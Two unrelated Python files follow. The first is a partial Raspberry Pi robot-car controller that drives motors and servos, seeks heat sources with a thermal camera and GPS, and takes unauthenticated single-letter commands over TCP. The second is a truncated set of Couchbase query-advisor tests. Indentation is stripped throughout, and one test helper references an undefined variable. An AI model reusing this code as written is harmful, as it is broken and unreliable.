GPIO.setup(IN4, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(buzzer, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(EchoPin, GPIO.IN)
GPIO.setup(TrigPin, GPIO.OUT)
GPIO.setup(FrontServoPin, GPIO.OUT)
GPIO.setup(ServoUpDownPin, GPIO.OUT)
GPIO.setup(ServoLeftRightPin, GPIO.OUT)
GPIO.setup(LED_R, GPIO.OUT)
GPIO.setup(LED_G, GPIO.OUT)
GPIO.setup(LED_B, GPIO.OUT)
# 设置pwm引脚和频率为2000hz
pwm_ENA = GPIO.PWM(ENA, 2000)
pwm_ENB = GPIO.PWM(ENB, 2000)
# pwm_ENA.start(0)
# pwm_ENB.start(0)
pwm_FrontServo = GPIO.PWM(FrontServoPin, 50)
pwm_UpDownServo = GPIO.PWM(ServoUpDownPin, 50)
pwm_LeftRightServo = GPIO.PWM(ServoLeftRightPin, 50)
pwm_FrontServo.start(0)
pwm_UpDownServo.start(0)
pwm_LeftRightServo.start(0)
# 红外
def tcam():
temp = (c_float * 768)()
ptemp = pointer(temp)
mlx90640.get_mlx90640_temp(ptemp)
my_nparray = np.frombuffer(temp, dtype=np.float32)
t = my_nparray.reshape((32, 24))
# print(np.max(t))
# print(np.argmax(t))
return np.max(t), np.argmax(t) % 32
# GPS 经纬高
def GetGPS():
lat = -1
lon = -1
alt = -1
s = serialPort.readline()
# print(s)
# print(type(s.decode()))
# print(s.find(b'GGA'))
s = s.decode()
if s.find('GGA') > -1:
msg = pynmea2.parse(s)
lat = msg.lat
lon = msg.lon
alt = msg.altitude
return (lat, lon, alt)
# 超声波测距函数
def Distance_test():
GPIO.output(TrigPin, GPIO.HIGH)
time.sleep(0.000015)
GPIO.output(TrigPin, GPIO.LOW)
while not GPIO.input(EchoPin):
pass
t1 = time.time()
while GPIO.input(EchoPin):
pass
t2 = time.time()
# print ("distance is %d " % (((t2 - t1)* 340 / 2) * 100))
time.sleep(0.01)
return ((t2 - t1) * 340 / 2) * 100
# 根据转动的角度来点亮相应的颜色
def corlor_light(pos):
if pos > 150:
GPIO.output(LED_R, GPIO.HIGH)
GPIO.output(LED_G, GPIO.LOW)
GPIO.output(LED_B, GPIO.LOW)
elif pos > 125:
GPIO.output(LED_R, GPIO.LOW)
GPIO.output(LED_G, GPIO.HIGH)
GPIO.output(LED_B, GPIO.LOW)
elif pos > 100:
GPIO.output(LED_R, GPIO.LOW)
GPIO.output(LED_G, GPIO.LOW)
GPIO.output(LED_B, GPIO.HIGH)
elif pos > 75:
GPIO.output(LED_R, GPIO.HIGH)
GPIO.output(LED_G, GPIO.HIGH)
GPIO.output(LED_B, GPIO.LOW)
elif pos > 50:
GPIO.output(LED_R, GPIO.LOW)
GPIO.output(LED_G, GPIO.HIGH)
GPIO.output(LED_B, GPIO.HIGH)
elif pos > 25:
GPIO.output(LED_R, GPIO.HIGH)
GPIO.output(LED_G, GPIO.LOW)
GPIO.output(LED_B, GPIO.HIGH)
elif pos > 0:
GPIO.output(LED_R, GPIO.HIGH)
GPIO.output(LED_G, GPIO.HIGH)
GPIO.output(LED_B, GPIO.HIGH)
else:
GPIO.output(LED_R, GPIO.LOW)
GPIO.output(LED_G, GPIO.LOW)
GPIO.output(LED_B, GPIO.LOW)
# 舵机来回转动
def servo_control_color():
for pos in range(19):
frontservo_appointed_detection(pos * 10)
time.sleep(0.02)
updownservo_appointed_detection(pos * 10)
time.sleep(0.02)
leftrightservo_appointed_detection(pos * 10)
time.sleep(0.02)
corlor_light(pos)
for pos in reversed(range(19)):
frontservo_appointed_detection(pos * 10)
time.sleep(0.02)
updownservo_appointed_detection(pos * 10)
time.sleep(0.02)
leftrightservo_appointed_detection(pos * 10)
time.sleep(0.02)
corlor_light(pos)
# 小车前进
def run():
GPIO.output(IN1, GPIO.HIGH)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.HIGH)
GPIO.output(IN4, GPIO.LOW)
# 启动PWM设置占空比为100(0--100)
pwm_ENA.start(CarSpeedControl)
pwm_ENB.start(CarSpeedControl)
print('runrun')
# pwm_ENA.ChangeDutyCycle(CarSpeedControl)
# pwm_ENB.ChangeDutyCycle(CarSpeedControl)
# 小车后退
def back():
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.HIGH)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.HIGH)
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
# 小车左转
def left():
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.HIGH)
GPIO.output(IN4, GPIO.LOW)
pwm_ENA.start(CarSpeedControl)
pwm_ENB.start(CarSpeedControl)
# 小车右转
def right():
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
GPIO.output(IN1, GPIO.HIGH)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.LOW)
pwm_ENA.start(CarSpeedControl)
pwm_ENB.start(CarSpeedControl)
# 小车原地左转
def spin_left():
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.HIGH)
GPIO.output(IN3, GPIO.HIGH)
GPIO.output(IN4, GPIO.LOW)
pwm_ENA.start(CarSpeedControl)
pwm_ENB.start(CarSpeedControl)
# 小车原地右转
def spin_right():
pwm_ENA.ChangeDutyCycle(CarSpeedControl)
pwm_ENB.ChangeDutyCycle(CarSpeedControl)
GPIO.output(IN1, GPIO.HIGH)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.HIGH)
pwm_ENA.start(CarSpeedControl)
pwm_ENB.start(CarSpeedControl)
# 小车停止
def brake():
GPIO.output(IN1, GPIO.LOW)
GPIO.output(IN2, GPIO.LOW)
GPIO.output(IN3, GPIO.LOW)
GPIO.output(IN4, GPIO.LOW)
#
def whistle():
GPIO.output(buzzer, GPIO.LOW)
time.sleep(0.1)
GPIO.output(buzzer, GPIO.HIGH)
time.sleep(0.001)
# 前舵机旋转到指定角度
def frontservo_appointed_detection(pos):
pulsewidth = (pos * 11) + 500
GPIO.output(FrontServoPin, GPIO.HIGH)
time.sleep(pulsewidth / 1000000.0)
GPIO.output(FrontServoPin, GPIO.LOW)
time.sleep(20.0 / 1000 - pulsewidth / 1000000.0)
global nowfrontPos
nowfrontPos = pos
def leftrightservo_appointed_detection(pos):
pulsewidth = (pos * 11) + 500
GPIO.output(ServoLeftRightPin, GPIO.HIGH)
time.sleep(pulsewidth / 1000000.0)
GPIO.output(ServoLeftRightPin, GPIO.LOW)
time.sleep(20.0 / 1000 - pulsewidth / 1000000.0)
global nowfrontPos
nowfrontPos = pos
# 摄像头舵机上下旋转到指定角度
def updownservo_appointed_detection(pos):
pulsewidth = (pos * 11) + 500
GPIO.output(ServoUpDownPin, GPIO.HIGH)
time.sleep(pulsewidth / 1000000.0)
GPIO.output(ServoUpDownPin, GPIO.LOW)
time.sleep(20.0 / 1000 - pulsewidth / 1000000.0)
global nowfrontPos
nowfrontPos = pos
def servo_init():
servoinitpos = 90
for i in range(18):
frontservo_appointed_detection(servoinitpos)
time.sleep(0.02)
updownservo_appointed_detection(servoinitpos)
time.sleep(0.02)
leftrightservo_appointed_detection(servoinitpos)
time.sleep(0.02)
# pwm_FrontServo.ChangeDutyCycle(0) # 归零信号
# pwm_LeftRightServo.ChangeDutyCycle(0) # 归零信号
# 0pwm_UpDownServo.ChangeDutyCycle(0) # 归零信号
def auto():
# init()
# servo_init()
taxishu = 0.008
FindNum = 0
while FindNum == 0:
distance = []
temperature = []
angle = []
for i in range(7):
for ii in range(9):
frontservo_appointed_detection(i * 30)
time.sleep(0.01)
time.sleep(0.8)
distance.append(Distance_test())
t, k = tcam()
temperature.append(t)
k = int((k - 15.5) / 31 * 55)
angle.append(k)
# 正前方为0,右侧为负数,左为正
for i in range(18):
frontservo_appointed_detection(90)
time.sleep(0.02)
print(distance)
print(temperature)
print(angle)
index = temperature.index(max(temperature))
target_angle = angle[index] + index * 30
print(index)
print(target_angle)
# 温度过高,找到火源
if temperature[index] > 100:
FindNum = FindNum + 1
lat, lon, alt = GetGPS()
print("-- Lat: %s -- Lon: %s -- Altitude: %s" % (lat, lon, alt))
for i in range(3):
servo_control_color()
break
if target_angle <= 90:
# 目标在右
needtime = (90 - target_angle) * taxishu
spin_right()
time.sleep(needtime)
brake()
elif target_angle > 90:
# 目标在左
needtime = (target_angle - 90) * taxishu
spin_left()
time.sleep(needtime)
brake()
if distance[index] > 60:
run()
time.sleep(2)
brake()
elif distance[index] < 60 and distance[index] > 40 or temperature[index] > 35:
run()
time.sleep(1)
print("快了")
brake()
elif (distance[index] < 50 or distance[min(index + 1, 6)] < 50 or distance[max(0, index - 1)] < 50) and (
temperature[index] < 38):
print('避障')
left()
time.sleep(1)
brake()
time.sleep(0.2)
run()
time.sleep(1.5)
brake()
time.sleep(0.2)
right()
time.sleep(2)
brake()
# 前舵机向左
def front_servo0():
for i in range(18):
frontservo_appointed_detection(0)
time.sleep(0.02)
def front_servo45():
for i in range(18):
frontservo_appointed_detection(45)
time.sleep(0.02)
def front_servo90():
for i in range(18):
frontservo_appointed_detection(90)
time.sleep(0.02)
def front_servo135():
for i in range(18):
frontservo_appointed_detection(135)
time.sleep(0.02)
def front_servo180():
for i in range(18):
frontservo_appointed_detection(180)
time.sleep(0.02)
# 摄像头舵机左右旋转到指定角度
################################################################ 需要为客户端提供服务
def do_service(connect_socket):
while True:
recv_data = connect_socket.recv(1024)
if len(recv_data) == 0:
# 发送方关闭tcp的连接,recv()不会阻塞,而是直接返回''
# print('client %s close' % str(client_addr))
# s.getpeername() s.getsockname()
# wiringpi.digitalWrite(0,0)
print('client %s close' % str(connect_socket.getpeername()))
break
if (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'w'):
with eventlet.Timeout(1, False):
run()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 's'):
with eventlet.Timeout(1, False):
back()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'a'):
with eventlet.Timeout(1, False):
left()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'd'):
with eventlet.Timeout(1, False):
right()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'x'):
with eventlet.Timeout(1, False):
brake()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'e'):
with eventlet.Timeout(1, False):
spin_right()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'q'):
with eventlet.Timeout(1, False):
spin_left()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'y'):
with eventlet.Timeout(1, False):
front_servo0()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'u'):
with eventlet.Timeout(1, False):
front_servo45()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'i'):
with eventlet.Timeout(1, False):
front_servo90()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'o'):
with eventlet.Timeout(1, False):
front_servo135()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'p'):
with eventlet.Timeout(1, False):
front_servo180()
elif (len(recv_data) == 1) and (recv_data.decode('gbk')[0] == 'n'):
auto()
# # else:
# wiringpi.digitalWrite(0,0)
# if len(recv_data) > 1:
# wiringpi.digitalWrite(0,0)
print('recv: %s' % recv_data.decode('gbk'))
def main():
init()
servo_init()
# 0.init wiringpi
# wiringpi.wiringPiSetup()
# wiringpi.pinMode(0,1)
# 1.创建socket
listen_socket = socket(AF_INET, SOCK_STREAM)
# stream流式套接字,对应tcp
# 设置允许复用地址,当建立连接之后服务器先关闭,设置地址复用
# 设置socket层属性 复用地址,不用等2msl, 允许
listen_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# 2.绑定端口
my_addr = ('192.168.183.171', 8888) #che
listen_socket.bind(my_addr)
# 3,接听状态
listen_socket.listen(4) # 设置套接字成监听,4表示一个己连接队列长度
print('listening...')
# 4.等待客户端来请求
# 父进程只专注接受连接请求
while True:
# 接受连接请求,创建连接套接字,用于客户端间通信
connect_socket, client_addr = listen_socket.accept() # accept默认会引起阻塞
# 新创建连接用的socket, 客户端的地址
# print(connect_socket)
# 每当来新的客户端连接,创建子进程,由子进程和客户端通信
process_do_service = Process(target=do_service, args=(connect_socket,))
process_do_service.start()
# 父进程,关闭connect_socket
connect_socket.close()
if __name__ == '__main__':
main()
|
tuq_advisor.py
|
from remote.remote_util import RemoteMachineShellConnection
from .tuq import QueryTests
import time
from deepdiff import DeepDiff
from membase.api.exception import CBQError
import threading
class QueryAdvisorTests(QueryTests):
def setUp(self):
super(QueryAdvisorTests, self).setUp()
self.log.info("============== QueryAdvisorTests setup has started ==============")
self.index_to_be_created = self.input.param("index_to_be_created", '')
if self.load_sample:
self.rest.load_sample("travel-sample")
init_time = time.time()
while True:
next_time = time.time()
query_response = self.run_cbq_query("SELECT COUNT(*) FROM `" + self.bucket_name + "`")
self.log.info(f"{self.bucket_name}+ count: {query_response['results'][0]['$1']}")
if query_response['results'][0]['$1'] == 31591:
break
if next_time - init_time > 600:
break
time.sleep(2)
self.wait_for_all_indexes_online()
list_of_indexes = self.run_cbq_query(query="select raw name from system:indexes WHERE indexes.bucket_id is missing")
for index in list_of_indexes['results']:
if index == "def_primary":
continue
else:
self.run_cbq_query(query="drop index `travel-sample`.`%s`" % index)
self.purge_all_sessions()
self.log.info("============== QueryAdvisorTests setup has completed ==============")
self.log_config_info()
def suite_setUp(self):
super(QueryAdvisorTests, self).suite_setUp()
self.log.info("============== QueryAdvisorTests suite_setup has started ==============")
self.log.info("============== QueryAdvisorTests suite_setup has completed ==============")
def tearDown(self):
self.log.info("============== QueryAdvisorTests tearDown has started ==============")
travel_sample = self.get_bucket_from_name("travel-sample")
if travel_sample:
self.delete_bucket(travel_sample)
self.log.info("============== QueryAdvisorTests tearDown has completed ==============")
super(QueryAdvisorTests, self).tearDown()
def suite_tearDown(self):
self.log.info("============== QueryAdvisorTests suite_tearDown has started ==============")
self.log.info("============== QueryAdvisorTests suite_tearDown has completed ==============")
super(QueryAdvisorTests, self).suite_tearDown()
def wait_for_index_online(self, bucket, index, scope='default', collection='default'):
if scope == 'default' and inventory == 'default':
query_index = f"SELECT state FROM system:indexes where keyspace_id = '{bucket}' and name = '{index}'"
else:
query_index = f"SELECT state FROM system:indexes where bucket_id = '{bucket}' and scope_id = '{scope}' and keyspace_id = '{collection}' and name = '{index}'"
init_time = time.time()
while True:
next_time = time.time()
query_response = self.run_cbq_query(query=query_index)
self.log.info(f"{index} state: {query_response['results'][0]['state']}")
if query_response['results'][0]['state'] == 'online':
break
if next_time - init_time > 600:
break
time.sleep(2)
def get_statements(self, advisor_results):
indexes = []
statements = []
for index in advisor_results['results'][0]['$1']['recommended_indexes']:
indexes.append(index['index'])
statements.append(index['statements'])
return indexes, statements
def purge_all_sessions(self):
try:
self.log.info("Purging all previous sessions")
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list'}) as List", server=self.master)
for task in results['results'][0]['List']:
session = task['tasks_cache']['name']
purge = self.run_cbq_query(query="SELECT ADVISOR({{'action':'purge', 'session':'{0}'}}) as Purge".format(session), server=self.master)
except Exception as e:
self.log.error("List/Purge sessions failed: {0}".format(e))
self.fail()
# Advisor on update statement
def test_query_string(self):
try:
advise = self.run_cbq_query(query="SELECT ADVISOR(\"UPDATE `{0}` SET city = 'San Francisco' WHERE lower(city) = 'sanfrancisco'\")".format(self.bucket_name), server=self.master)
simple_indexes, statements = self.get_statements(advise)
except Exception as e:
self.log.error("Advisor statement failed: {0}".format(e))
self.fail()
for index in simple_indexes:
self.run_cbq_query(query=index)
self.wait_for_all_indexes_online()
try:
results_with_advise_index = self.run_cbq_query(query="UPDATE `{0}` SET city = 'SF' WHERE lower(city) = 'san francisco'".format(self.bucket_name), server=self.master)
self.assertEqual(results_with_advise_index['status'], 'success')
self.assertEqual(results_with_advise_index['metrics']['mutationCount'], 938)
finally:
index_name = index.split("INDEX")[1].split("ON")[0].strip()
self.run_cbq_query("DROP INDEX `{0}`.{1}".format(self.bucket_name,index_name))
# same query: query count should be > 1
def test_same_query_array(self):
try:
results_simple = self.run_cbq_query(query="SELECT ADVISOR([ \
\"UPDATE `{0}` SET city = 'San Francisco' WHERE lower(city) = 'sanfrancisco'\", \
\"UPDATE `{0}` SET city = 'San Francisco' WHERE lower(city) = 'sanfrancisco'\" \
])".format(self.bucket_name), server=self.master)
simple_indexes, statements = self.get_statements(results_simple)
self.assertEqual(statements[0][0]['run_count'], 2)
except Exception as e:
self.log.error("Advisor statement failed: {0}".format(e))
self.fail()
# similar query: statement count should be > 1
def test_similar_query_array(self):
try:
results_simple = self.run_cbq_query(query="SELECT ADVISOR([ \
\"UPDATE `{0}` SET city = 'San Francisco' WHERE lower(city) = 'sanfrancisco'\", \
\"UPDATE `{0}` SET city = 'San Francisco' WHERE lower(city) = 'saintfrancois'\" \
])".format(self.bucket_name), server=self.master)
simple_indexes, statements = self.get_statements(results_simple)
self.assertEqual(len(statements[0]), 2)
except Exception as e:
self.log.error("Advisor statement failed: {0}".format(e))
self.fail()
def test_diff_query_array(self):
query1 = f"UPDATE `{self.bucket_name}` SET city = 'San Francisco' WHERE lower(city) = 'sanfrancisco'"
query2 = f"SELECT name, city FROM `{self.bucket_name}` WHERE type = 'hotel' AND country = 'France'"
query3 = f"SELECT airportname FROM `{self.bucket_name}` WHERE type = 'airport' AND lower(city) = 'lyon'"
try:
advise = self.run_cbq_query(query=f"SELECT ADVISOR([\"{query1}\", \"{query2}\", \"{query3}\"])", server=self.master)
self.assertEqual(len(advise['results'][0]['$1']['recommended_indexes']), 3)
except Exception as e:
self.log.error("Advisor statement failed: {0}".format(e))
self.fail()
def test_query_output_array(self):
# Run some queries
query_paris = "SELECT airportname FROM `{0}` WHERE type = 'airport' and lower(city) = 'paris' AND country = 'France'".format(self.bucket_name)
query_lyon = "SELECT airportname FROM `{0}` WHERE type ='airport' and lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name)
query_grenoble = "SELECT airportname FROM `{0}` WHERE type = 'airport' and lower(city) = 'grenoble' AND country = 'France'".format(self.bucket_name)
results = self.run_cbq_query(query=query_paris, server=self.master)
results = self.run_cbq_query(query=query_paris, server=self.master)
results = self.run_cbq_query(query=query_paris, server=self.master)
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_grenoble, server=self.master)
try:
results = self.run_cbq_query(query="select ADVISOR((SELECT RAW statement FROM system:completed_requests order by requestTime DESC limit 6)) as `Advise`".format(self.bucket_name), server=self.master)
advises = results['results'][0]['Advise']
query_count = dict()
for index in advises['recommended_indexes']:
for query in index['statements']:
query_count[query['statement']] = query['run_count']
self.assertEqual(query_count[query_paris], 3)
self.assertEqual(query_count[query_lyon], 2)
self.assertEqual(query_count[query_grenoble], 1)
except Exception as e:
self.log.error("Advisor statement failed: {0}".format(e))
self.fail()
def test_query_array_arg_large(self,num=10):
query_paris = "SELECT airportname FROM `{0}` WHERE type = 'airport' and lower(city) = 'paris' AND country = 'France'".format(self.bucket_name)
query_array = [query_paris] * num
try:
results = self.run_cbq_query(query="select ADVISOR({0}) as `Advise`".format(query_array), server=self.master)
advises = results['results'][0]['Advise']
self.assertEqual(advises['recommended_indexes'][0]['statements'][0]['run_count'], num)
self.assertEqual(advises['recommended_indexes'][0]['statements'][0]['statement'], query_paris)
except Exception as e:
self.log.error("Advisor statement failed: {0}".format(e))
self.fail()
# get session recommendation for completed session
def test_get_session_completed(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '10s', 'query_count': 2 })", server=self.master)
session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Wait for session to complete
self.sleep(10)
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'get', 'session': '{0}'}})".format(session), server=self.master)
self.assertTrue('recommended_indexes' in results['results'][0]['$1'][0][0], "There are no recommended index: {0}".format(results['results'][0]['$1'][0][0]))
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_get_session_stopped(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", server=self.master)
session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
self.sleep(3)
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(session), server=self.master)
# Stop a second time to ensure no side effect (see MB-48576)
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'get', 'session': '{0}'}})".format(session), server=self.master)
self.assertTrue('recommended_indexes' in results['results'][0]['$1'][0][0], "There are no recommended index: {0}".format(results['results'][0]['$1'][0][0]))
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_stop_session(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1234567ms', 'query_count': 2 })", server=self.master)
session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list'}) as List", server=self.master)
task = results['results'][0]['List'][0]['tasks_cache']
self.log.info("Task cache is {0}".format(task))
self.assertEqual(list(task.keys()), ['class', 'delay', 'id', 'name', 'node', 'results', 'state', 'subClass', 'submitTime'])
self.assertEqual(task['state'], "cancelled")
self.assertEqual(task['delay'], "20m34.567s")
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_abort_session(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '3600s', 'query_count': 200 })", server=self.master)
session = results['results'][0]['$1']['session']
# Check session is active
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'active'}) as List", server=self.master)
task = results['results'][0]['List'][0]['tasks_cache']
self.log.info("Task cache is {0}".format(task))
self.assertEqual(task['state'], "scheduled")
self.assertEqual(task['delay'], "1h0m0s")
self.assertEqual(task['name'], session)
# Abort session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'abort', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", server=self.master)
self.assertEqual(results['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_purge_session_completed(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '5000ms', 'query_count': 2 })", server=self.master)
session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Wait for session to complete
self.sleep(5)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list'}) as List", server=self.master)
task = results['results'][0]['List'][0]['tasks_cache']
self.assertEqual(task['state'], "completed")
# Purge session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'purge', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", server=self.master)
self.assertEqual(results['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_purge_session_stopped(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '5000s', 'query_count': 2 })", server=self.master)
session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Stop session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list'}) as List", server=self.master)
task = results['results'][0]['List'][0]['tasks_cache']
self.assertEqual(task['state'], "cancelled")
# Purge session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'purge', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", server=self.master)
self.assertEqual(results['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_purge_session_active(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '3600s', 'query_count': 200 })", server=self.master)
session = results['results'][0]['$1']['session']
# Check session is active
list_all = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'active'}) as List", server=self.master)
task = list_all['results'][0]['List'][0]['tasks_cache']
self.log.info("Task cache is {0}".format(task))
self.assertEqual(task['state'], "scheduled")
self.assertEqual(task['delay'], "1h0m0s")
self.assertEqual(task['name'], session)
# Purge session
purge = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'purge', 'session': '{0}'}})".format(session), server=self.master)
list_all = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", server=self.master)
self.assertEqual(list_all['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_list_session(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '99h', 'query_count': 2 })", server=self.master)
active_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '50ms', 'query_count': 2 })", server=self.master)
completed_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1600m', 'query_count': 2 })", server=self.master)
stopped_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Stop session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(stopped_session), server=self.master)
# List sessions
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list'}) as List", server=self.master)
all_sessions = dict()
for task in results['results'][0]['List']:
all_sessions[task['tasks_cache']['state']] = task['tasks_cache']['name']
self.assertEqual(len(all_sessions), 3)
self.assertEqual(all_sessions['scheduled'], active_session)
self.assertEqual(all_sessions['cancelled'], stopped_session)
self.assertEqual(all_sessions['completed'], completed_session)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_list_session_active(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '99h', 'query_count': 2 })", server=self.master)
active_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '50ms', 'query_count': 2 })", server=self.master)
completed_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1600m', 'query_count': 2 })", server=self.master)
stopped_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Stop session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(stopped_session), server=self.master)
# List ACTIVE sessions
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status':'active'}) as List", server=self.master)
all_sessions = dict()
for task in results['results'][0]['List']:
all_sessions[task['tasks_cache']['state']] = task['tasks_cache']['name']
self.assertEqual(len(all_sessions), 1)
self.assertEqual(all_sessions['scheduled'], active_session)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_list_session_completed(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '99h', 'query_count': 2 })", server=self.master)
active_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '50ms', 'query_count': 2 })", server=self.master)
completed_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1600m', 'query_count': 2 })", server=self.master)
stopped_session = results['results'][0]['$1']['session']
